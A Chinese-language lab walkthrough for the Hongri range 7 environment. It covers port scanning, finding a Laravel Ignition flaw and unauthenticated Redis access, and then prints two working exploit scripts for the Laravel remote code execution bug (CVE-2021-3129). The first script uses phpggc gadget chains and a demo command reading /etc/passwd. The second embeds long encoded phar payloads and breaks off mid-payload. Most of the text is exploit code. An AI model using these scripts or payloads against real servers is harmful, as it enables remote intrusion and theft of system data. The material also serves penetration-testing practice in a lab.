红日靶场七——WP
靶场拓扑
一、外网打点
1.1 信息收集
对外网IP172.16.10.234进行信息收集,使用工具Kmap探测端口开放情况,命令如下:
./Kmap -i 172.16.10.234 -p 1-65535 -o kk.txt -n 20
81端口开放了Laravel服务,6379端口开放了Redis服务。
版本8.29.0<8.4.3,存在远程代码执行漏洞。
使用Fscan进行漏洞扫描,发现存在Redis未授权漏洞:
二、漏洞利用
根据前边的信息收集,发现有两个漏洞可以进行利用,一个是Laravel一个是Redis未授权访问。
2.1 Laravel-Getshell
EXP如下:
#!/usr/bin/python3
import requests as req
import os, uuid
class Exp:
__gadget_chains = {
"monolog_rce1": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce1 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",
"monolog_rce2": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce2 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",
"monolog_rce3": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce3 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",
} # phpggc链集合,暂时添加rce1后续再添加其他增强通杀能力
__delimiter_len = 8 # 定界符长度
def __vul_check(self):
resp = req.get(self.__url, verify=False)
if resp.status_code != 405 and "laravel" not in resp.text:
return False
return True
def __payload_send(self, payload):
header = {
"Accept": "application/json"
}
data = {
"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"parameters": {
"variableName": "cve20213129",
"viewFile": ""
}
}
data["parameters"]["viewFile"] = payload
resp = req.post(self.__url, headers=header, json=data, verify=False)
# print(resp.text)
return resp
def __command_handler(self, command):
"""
因为用户命令要注入到payload生成的命令中,为了防止影响结构,所以进行一些处理。
"""
self.__delimiter = str(uuid.uuid1())[:self.__delimiter_len] # 定界符用于定位页面中命令执行结果的位置。
# print(delimiter)
command = "echo %s && %s && echo %s" % (self.__delimiter, command, self.__delimiter)
# print(command)
escaped_chars = [' ', '&', '|'] # 我只想到这么多,可自行添加。
for c in escaped_chars:
command = command.replace(c, '\\' + c)
# print(command)
return command
def __clear_log(self):
return self.__payload_send(
"php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log")
def __gen_payload(self, gadget_chain):
gen_shell = self.__gadget_chains[gadget_chain] % (self.__command)
# print(gen_shell)
os.system(gen_shell)
with open('payload.txt', 'r') as f:
payload = f.read().replace('\n', '') + 'a' # 添加一个字符使得两个完整的payload总是只有一个可以正常解码
os.system("rm payload.txt")
# print(payload)
return payload
def __decode_log(self):
return self.__payload_send(
"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log")
def __unserialize_log(self):
return self.__payload_send("phar://../storage/logs/laravel.log/test.txt")
def __rce(self):
text = self.__unserialize_log().text
# print(text)
echo_find = text.find(self.__delimiter)
# print(echo_find)
if echo_find >= 0:
return text[echo_find + self.__delimiter_len + 1: text.find(self.__delimiter, echo_find + 1)]
else:
return "[-] RCE echo is not found."
def exp(self):
for gadget_chain in self.__gadget_chains.keys():
print("[*] Try to use %s for exploitation." % (gadget_chain))
self.__clear_log()
self.__clear_log()
self.__payload_send('a' * 2)
self.__payload_send(self.__gen_payload(gadget_chain))
self.__decode_log()
print("[*] Result:")
print(self.__rce())
def __init__(self, target, command):
self.target = target
self.__url = req.compat.urljoin(target, "_ignition/execute-solution")
self.__command = self.__command_handler(command)
if not self.__vul_check():
print("[-] [%s] is seems not vulnerable." % (self.target))
print("[*] You can also call obj.exp() to force an attack.")
else:
self.exp()
def main():
Exp("http://127.0.0.1:8888", "cat /etc/passwd")
if __name__ == '__main__':
main()
还需下载phpggc序列化攻击工具:
https://github.com/ambionics/phpggc
将phpggc与Laravel_getshell.py放在统一目录下
攻击用法:
python3 Laravel_getshell.py
利用失败,告辞,该用另一个EXP:
Laravel-exp
# -*- coding: utf-8 -*-
import requests,json
import sys,re
proxies = {
"http": '127.0.0.1:8080'}
header={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Content-Type":"application/json"
}
def clearlog(url):
data = {
"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"parameters": {
"variableName":"username",
"viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"
}
}
req=requests.post(url,headers=header,data=json.dumps(data,indent=1))
return req
def AA(url):
data={
"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"parameters": {
"variableName":"username",
"viewFile": "AA"
}
}
req=requests.post(url,headers=header,data=json.dumps(data,indent=1))
return req
def sendpayloadwindows(url):
data={
"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"parameters": {
"variableName":"username",
"viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=71=00=2F=00=42=00=77=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=6F=00=42=00=77=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=45=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=63=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=55=00=32=00=6C=00=36=00=5A=00=53=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=32=00=4E=00=44=00=45=00=36=00=49=00=6D=00=56=00=6A=00=61=00=47=00=38=00=67=00=58=00=6A=00=77=00=2F=00=63=00=47=00=68=00=77=00=49=00=48=00=4E=00=6C=00=63=00=33=00=4E=00=70=00=62=00=32=00=35=00=66=00=63=00=33=00=52=00=68=00=63=00=6E=00=51=00=6F=00=4B=00=54=00=74=00=41=00=63=00=32=00=56=00=30=00=58=00=33=00=52=00=70=00=62=00=57=00=56=00=66=00=62=00=47=00=6C=00=74=00=61=00=58=00=51=00=6F=00=4D=00=43=00=6B=00=37=00=51=00=47=00=56=00=79=00=63=00=6D=00=39=00=79=00=58=00=33=00=4A=00=6C=00=63=00=47=00=39=00=79=00=64=00=47=00=6C=00=75=00=5A=00=79=00=67=00=77=00=4B=00=54=00=74=00=6D=00=64=00=57=00=35=00=6A=00=64=00=47=00=6C=00=76=00=62=00=69=00=42=00=46=00=4B=00=46=00=34=00=6B=00=52=00=43=00=78=00=65=00=4A=00=45=00=73=00=70=00=65=00=32=00=5A=00=76=00=63=00=69=00=68=00=65=00=4A=00=47=00=6B=00=39=00=4D=00=44=00=74=00=65=00=4A=00=47=00=6C=00=65=00=50=00=48=00=4E=00=30=00=63=00=6D=00=78=00=6C=00=62=00=69=00=68=00=65=00=4A=00=45=00=51=00=70=00=4F=00=31=00=34=00=6B=00=61=00=53=00=73=00=72=00=4B=00=53=00=42=00=37=00=58=00=69=00=52=00=45=00=57=00=31=00=34=00=6B=00=61=00=56=00=30=00=67=00=50=00=53=00=42=00=65=00=4A=00=45=00=52=00=62=00=58=00=69=00=52=00=70=00=58=00=56=00=35=00=65=00=58=00=69=00=52=00=4C=00=57=00=31=00=34=00=6B=00=61=00=53=00=73=00=78=00=58=00=69=00=59=00=78=00=4E=00=56=00=30=00=37=00=66=00=58=00=4A=00=6C=00=64=00=48=00=56=00=79=00=62=00=69=00=42=00=65=00=4A=00=45=00=51=00=37=00=66=00=57=00=5A=00=31=00=62=00=6D=00=4E=00=30=00=61=00=57=00=39=00=75=00=49=00=46=00=45=00=6F=00=58=00=69=00=52=00=45=00=4B=00=58=00=74=00=79=00=5A=00=58=00=52=00=31=00=63=00=6D=00=34=00=67=00=59=00=6D=00=46=00=7A=00=5A=00=54=00=59=00=30=00=58=00=32=00=56=00=75=00=59=00=32=00=39=00=6B=00=5A=00=53=00=68=00=65=00=4A=00=45=00=51=00=70=00=4F=00=33=00=31=00=6D=00=64=00=57=00=35=00=6A=00=64=00=47=00=6C=00=76=00=62=00=69=00=42=00=50=00=4B=00=46=00=34=00=6B=00=52=00=43=00=6C=00=37=00=63=00=6D=00=56=00=30=00=64=00=58=00=4A=00=75=00=49=00=47=00=4A=00=68=00=63=00=32=00=55=00=32=00=4E=00=46=00=39=00=6B=00=5A=00=57=00=4E=00=76=00=5A=00=47=00=55=00=6F=00=58=00=69=00=52=00=45=00=4B=00=54=00=74=00=39=00=58=00=69=00=52=00=51=00=50=00=53=00=64=00=77=00=59=00=58=00=4E=00=7A=00=4A=00=7A=00=74=00=65=00=4A=00=46=00=59=00=39=00=4A=00=33=00=42=00=68=00=65=00=57=00=78=00=76=00=59=00=57=00=51=00=6E=00=4F=00=31=00=34=00=6B=00=56=00=44=00=30=00=6E=00=4D=00=32=00=4D=00=32=00=5A=00=54=00=42=00=69=00=4F=00=47=00=45=00=35=00=59=00=7A=00=45=00=31=00=4D=00=6A=00=49=00=30=00=59=00=53=00=63=00=37=00=61=00=57=00=59=00=67=00=4B=00=47=00=6C=00=7A=00=63=00=32=00=56=00=30=00=4B=00=46=00=34=00=6B=00=58=00=31=00=42=00=50=00=55=00=31=00=52=00=62=00=58=00=69=00=52=00=51=00=58=00=53=00=6B=00=70=00=65=00=31=00=34=00=6B=00=52=00=6A=00=31=00=50=00=4B=00=45=00=55=00=6F=00=54=00=79=00=68=00=65=00=4A=00=46=00=39=00=51=00=54=00=31=00=4E=00=55=00=57=00=31=00=34=00=6B=00=55=00=46=00=30=00=70=00=4C=00=46=00=34=00=6B=00=56=00=43=00=6B=00=70=00=4F=00=32=00=6C=00=6D=00=49=00=43=00=68=00=70=00=63=00=33=00=4E=00=6C=00=64=00=43=00=68=00=65=00=4A=00=46=00=39=00=54=00=52=00=56=00=4E=00=54=00=53=00=55=00=39=00=4F=00=57=00=31=00=34=00=6B=00=56=00=6C=00=30=00=70=00=4B=00=58=00=74=00=65=00=4A=00=45=00=77=00=39=00=58=00=69=00=52=00=66=00=55=00=30=00=56=00=54=00=55=00=30=00=6C=00=50=00=54=00=6C=00=74=00=65=00=4A=00=46=00=5A=00=64=00=4F=00=31=00=34=00=6B=00=51=00=54=00=31=00=6C=00=65=00=48=00=42=00=73=00=62=00=32=00=52=00=6C=00=4B=00=43=00=64=00=65=00=66=00=43=00=63=00=73=00=58=00=69=00=52=00=4D=00=4B=00=54=00=74=00=6A=00=62=00=47=00=46=00=7A=00=63=00=79=00=42=00=44=00=65=00=33=00=42=00=31=00=59=00=6D=00=78=00=70=00=59=00=79=00=42=00=6D=00=64=00=57=00=35=00=6A=00=64=00=47=00=6C=00=76=00=62=00=69=00=42=00=75=00=64=00=6D=00=39=00=72=00=5A=00=53=00=68=00=65=00=4A=00=48=00=41=00=70=00=49=00=48=00=74=00=6C=00=64=00=6D=00=46=00=73=00=4B=00=46=00=34=00=6B=00=63=00=43=00=34=00=69=00=49=00=69=00=6B=00=37=00=66=00=58=00=31=00=65=00=4A=00=46=00=49=00=39=00=62=00=6D=00=56=00=33=00=49=00=45=00=4D=00=6F=00=4B=00=54=00=74=00=65=00=4A=00=46=00=49=00=74=00=58=00=6A=00=35=00=75=00=64=00=6D=00=39=00=72=00=5A=00=53=00=68=00=65=00=4A=00=45=00=46=00=62=00=4D=00=46=00=30=00=70=00=4F=00=32=00=56=00=6A=00=61=00=47=00=38=00=67=00=63=00=33=00=56=00=69=00=63=00=33=00=52=00=79=00=4B=00=47=00=31=00=6B=00=4E=00=53=00=68=00=65=00=4A=00=46=00=41=00=75=00=58=00=69=00=52=00=55=00=4B=00=53=00=77=00=77=00=4C=00=44=00=45=00=32=00=4B=00=54=00=74=00=6C=00=59=00=32=00=68=00=76=00=49=00=46=00=45=00=6F=00=52=00=53=00=68=00=41=00=63=00=6E=00=56=00=75=00=4B=00=46=00=34=00=6B=00=52=00=69=00=6B=00=73=00=58=00=69=00=52=00=55=00=4B=00=53=00=6B=00=37=00=5A=00=57=00=4E=00=6F=00=62=00=79=00=42=00=7A=00=64=00=57=00=4A=00=7A=00=64=00=48=00=49=00=6F=00=62=00=57=00=51=00=31=00=4B=00=46=00=34=00=6B=00=55=00=43=00=35=00=65=00=4A=00=46=00=51=00=70=00=4C=00=44=00=45=00=32=00=4B=00=54=00=74=00=39=00=5A=00=57=00=78=00=7A=00=5A=00=58=00=74=00=65=00=4A=00=46=00=39=00=54=00=52=00=56=00=4E=00=54=00=53=00=55=00=39=00=4F=00=57=00=31=00=34=00=6B=00=56=00=6C=00=30=00=39=00=58=00=69=00=52=00=47=00=4F=00=33=00=31=00=39=00=49=00=44=00=34=00=75=00=4C=00=32=00=5A=00=31=00=59=00=32=00=74=00=35=00=62=00=33=00=55=00=75=00=63=00=47=00=68=00=77=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=55=00=36=00=49=00=6D=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=31=00=39=00=63=00=7A=00=6F=00=34=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74=00=7A=00=4F=00=6A=00=45=00=30=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=70=00=62=00=6D=00=6C=00=30=00=61=00=57=00=46=00=73=00=61=00=58=00=70=00=6C=00=5A=00=43=00=49=00=37=00=59=00=6A=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=78=00=70=00=62=00=57=00=6C=00=30=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=42=00=79=00=62=00=32=00=4E=00=6C=00=63=00=33=00=4E=00=76=00=63=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=59=00=33=00=56=00=79=00=63=00=6D=00=56=00=75=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6C=00=4E=00=70=00=65=00=6D=00=55=00=69=00=4F=00=32=00=6B=00=36=00=4C=00=54=00=45=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=49=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=51=00=78=00=4F=00=69=00=4A=00=6C=00=59=00=32=00=68=00=76=00=49=00=46=00=34=00=38=00=50=00=33=00=42=00=6F=00=63=00=43=00=42=00=7A=00=5A=00=58=00=4E=00=7A=00=61=00=57=00=39=00=75=00=58=00=33=00=4E=00=30=00=59=00=58=00=4A=00=30=00=4B=00=43=00=6B=00=37=00=51=00=48=00=4E=00=6C=00=64=00=46=00=39=00=30=00=61=00=57=00=31=00=6C=00=58=00=32=00=78=00=70=00=62=00=57=00=6C=00=30=00=4B=00=44=00=41=00=70=00=4F=00=30=00=42=00=6C=00=63=00=6E=00=4A=00=76=00=63=00=6C=00=39=00=79=00=5A=00=58=00=42=00=76=00=63=00=6E=00=52=00=70=00=62=00=6D=00=63=00=6F=00=4D=00=43=00=6B=00=37=00=5A=00=6E=00=56=00=75=00=59=00=33=00=52=00=70=00=62=00=32=00=34=00=67=00=52=00=53=00=68=00=65=00=4A=00=45=00=51=00=73=00=58=00=69=00=52=00=4C=00=4B=00=58=00=74=00=6D=00=62=00=33=00=49=00=6F=00=58=00=69=00=52=00=70=00=50=00=54=00=41=00=37=00=58=00=69=00=52=00=70=00=58=00=6A=00=78=00=7A=00=64=00=48=00=4A=00=73=00=5A=00=57=00=34=00=6F=00=58=00=69=00=52=00=45=00=4B=00=54=00=74=00=65=00=4A=00=47=00=6B=00=72=00=4B=00=79=00=6B=00=67=00=65=00=31=00=34=00=6B=00=52=00=46=00=74=00=65=00=4A=00=47=00=6C=00=64=00=49=00=44=00=30=00=67=00=58=00=69=00=52=00=45=00=57=00=31=00=34=00=6B=00=61=00=56=00=31=00=65=00=58=00=6C=00=34=00=6B=00=53=00=31=00=74=00=65=00=4A=00=47=00=6B=00=72=00=4D=00=56=00=34=00=6D=00=4D=00=54=00=56=00=64=00=4F=00=33=00=31=00=79=00=5A=00=58=00=52=00=31=00=63=00=6D=00=34=00=67=00=58=00=69=00=52=00=45=00=4F=00=33=00=31=00=6D=00=64=00=57=00=35=00=6A=00=64=00=47=00=6C=00=76=00=62=00=69=00=42=00=52=00=4B=00=46=00=34=00=6B=00=52=00=43=00=6C=00=37=00=63=00=6D=00=56=00=30=00=64=00=58=00=4A=00=75=00=49=00=47=00=4A=00=68=00=63=00=32=00=55=00=32=00=4E=00=46=00=39=00=6C=00=62=00=6D=00=4E=00=76=00=5A=00=47=00=55=00=6F=00=58=00=69=00=52=00=45=00=4B=00=54=00=74=00=39=00=5A=00=6E=00=56=00=75=00=59=00=33=00=52=00=70=00=62=00=32=00=34=00=67=00=54=00=79=00=68=00=65=00=4A=00=45=00=51=00=70=00=65=00=33=00=4A=00=6C=00=64=00=48=00=56=00=79=00=62=00=69=00=42=00=69=00=59=00=58=00=4E=00=6C=00=4E=00=6A=00=52=00=66=00=5A=00=47=00=56=00=6A=00=62=00=32=00=52=00=6C=00=4B=00=46=00=34=00=6B=00=52=00=43=00=6B=00=37=00=66=00=56=00=34=00=6B=00=55=00=44=00=30=00=6E=00=63=00=47=00=46=00=7A=00=63=00=79=00=63=00=37=00=58=00=69=00=52=00=57=00=50=00=53=00=64=00=77=00=59=00=58=00=6C=00=73=00=62=00=32=00=46=00=6B=00=4A=00=7A=00=74=00=65=00=4A=00=46=00=51=00=39=00=4A=00=7A=00=4E=00=6A=00=4E=00=6D=00=55=00=77=00=59=00=6A=00=68=00=68=00=4F=00=57=00=4D=00=78=00=4E=00=54=00=49=00=79=00=4E=00=47=00=45=00=6E=00=4F=00=32=00=6C=00=6D=00=49=00=43=00=68=00=70=00=63=00=33=00=4E=00=6C=00=64=00=43=00=68=00=65=00=4A=00=46=00=39=00=51=00=54=00=31=00=4E=00=55=00=57=00=31=00=34=00=6B=00=55=00=46=00=30=00=70=00=4B=00=58=00=74=00=65=00=4A=00=45=00=59=00=39=00=54=00=79=00=68=00=46=00=4B=00=45=00=38=00=6F=00=58=00=69=00=52=00=66=00=55=00=45=00=39=00=54=00=56=00=46=00=74=00=65=00=4A=00=46=00=42=00=64=00=4B=00=53=00=78=00=65=00=4A=00=46=00=51=00=70=00=4B=00=54=00=74=00=70=00=5A=00=69=00=41=00=6F=00=61=00=58=00=4E=00=7A=00=5A=00=58=00=51=00=6F=00=58=00=69=00=52=00=66=00=55=00=30=00=56=00=54=00=55=00=30=00=6C=00=50=00=54=00=6C=00=74=00=65=00=4A=00=46=00=5A=00=64=00=4B=00=53=00=6C=00=37=00=58=00=69=00=52=00=4D=00=50=00=56=00=34=00=6B=00=58=00=31=00=4E=00=46=00=55=00=31=00=4E=00=4A=00=54=00=30=00=35=00=62=00=58=00=69=00=52=00=57=00=58=00=54=00=74=00=65=00=4A=00=45=00=45=00=39=00=5A=00=58=00=68=00=77=00=62=00=47=00=39=00=6B=00=5A=00=53=00=67=00=6E=00=58=00=6E=00=77=00=6E=00=4C=00=46=00=34=00=6B=00=54=00=43=00=6B=00=37=00=59=00=32=00=78=00=68=00=63=00=33=00=4D=00=67=00=51=00=33=00=74=00=77=00=64=00=57=00=4A=00=73=00=61=00=57=00=4D=00=67=00=5A=00=6E=00=56=00=75=00=59=00=33=00=52=00=70=00=62=00=32=00=34=00=67=00=62=00=6E=00=5A=00=76=00=61=00=32=00=55=00=6F=00=58=00=69=00=52=00=77=00=4B=00=53=00=42=00=37=00=5A=00=58=00=5A=00=68=00=62=00=43=00=68=00=65=00=4A=00=48=00=41=00=75=00=49=00=69=00=49=00=70=00=4F=00=33=00=31=00=39=00=58=00=69=00=52=00=53=00=50=00=57=00=35=00=6C=00=64=00=79=00=42=00=44=00=4B=00=43=00=6B=00=37=00=58=00=69=00=52=00=53=00=4C=00=56=00=34=00=2B=00=62=00=6E=00=5A=00=76=00=61=00=32=00=55=00=6F=00=58=00=69=00=52=00=42=00=57=00=7A=00=42=00=64=00=4B=00=54=00=74=00=6C=00=59=00=32=00=68=00=76=00=49=00=48=00=4E=00=31=00=59=00=6E=00=4E=00=30=00=63=00=69=00=68=00=74=00=5A=00=44=00=55=00=6F=00=58=00=69=00=52=00=51=00=4C=00=6C=00=34=00=6B=00=56=00=43=00=6B=00=73=00=4D=00=43=00=77=00=78=00=4E=00=69=00=6B=00=37=00=5A=00=57=00=4E=00=6F=00=62=00=79=00=42=00=52=00=4B=00=45=00=55=00=6F=00=51=00=48=00=4A=00=31=00=62=00=69=00=68=00=65=00=4A=00=45=00=59=00=70=00=4C=00=46=00=34=00=6B=00=56=00=43=00=6B=00=70=00=4F=00=32=00=56=00=6A=00=61=00=47=00=38=00=67=00=63=00=33=00=56=00=69=00=63=00=33=00=52=00=79=00=4B=00=47=00=31=00=6B=00=4E=00=53=00=68=00=65=00=4A=00=46=00=41=00=75=00=58=00=69=00=52=00=55=00=4B=00=53=00=77=00=78=00=4E=00=69=00=6B=00=37=00=66=00=57=00=56=00=73=00=63=00=32=00=56=00=37=00=58=00=69=00=52=00=66=00=55=00=30=00=56=00=54=00=55=00=30=00=6C=00=50=00=54=00=6C=00=74=00=65=00=4A=00=46=00=5A=00=64=00=50=00=56=00=34=00=6B=00=52=00=6A=00=74=00=39=00=66=00=53=00=41=00=2B=00=4C=00=69=00=39=00=6D=00=64=00=57=00=4E=00=72=00=65=00=57=00=39=00=31=00=4C=00=6E=00=42=00=6F=00=63=00=43=00=49=00=37=00=63=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=62=00=47=00=56=00=32=00=5A=00=57=00=77=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4E=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=57=00=35=00=70=00=64=00=47=00=6C=00=68=00=62=00=47=00=6C=00=36=00=5A=00=57=00=51=00=69=00=4F=00=32=00=49=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=45=00=30=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=4A=00=4D=00=61=00=57=00=31=00=70=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=45=00=7A=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=77=00=63=00=6D=00=39=00=6A=00=5A=00=58=00=4E=00=7A=00=62=00=33=00=4A=00=7A=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=49=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=7A=00=4F=00=6A=00=63=00=36=00=49=00=6D=00=4E=00=31=00=63=00=6E=00=4A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=32=00=6B=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=59=00=36=00=49=00=6E=00=4E=00=35=00=63=00=33=00=52=00=6C=00=62=00=53=00=49=00=37=00=66=00=58=00=31=00=39=00=42=00=51=00=41=00=41=00=41=00=47=00=52=00=31=00=62=00=57=00=31=00=35=00=42=00=41=00=41=00=41=00=41=00=41=00=4D=00=39=00=43=00=57=00=41=00=45=00=41=00=41=00=41=00=41=00=44=00=48=00=35=00=2F=00=32=00=4B=00=51=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=41=00=41=00=41=00=41=00=48=00=52=00=6C=00=63=00=33=00=51=00=75=00=64=00=48=00=68=00=30=00=42=00=41=00=41=00=41=00=41=00=41=00=4D=00=39=00=43=00=57=00=41=00=45=00=41=00=41=00=41=00=41=00=44=00=48=00=35=00=2F=00=32=00=4B=00=51=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=52=00=76=00=35=00=4F=00=50=00=6D=00=31=00=45=00=6C=00=61=00=48=00=76=00=4D=00=42=00=6E=00=46=00=53=00=54=00=2F=00=6E=00=53=00=36=00=54=00=2B=00=75=00=46=00=69=00=51=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"
}
}
req=requests.post(url,headers=header,data=json.dumps(data,indent=1))
return req
def sendpayloadlinux(url):
data={
"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"parameters": {
"variableName":"username",
"viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=72=00=39=00=43=00=41=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=6D=00=43=00=41=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=0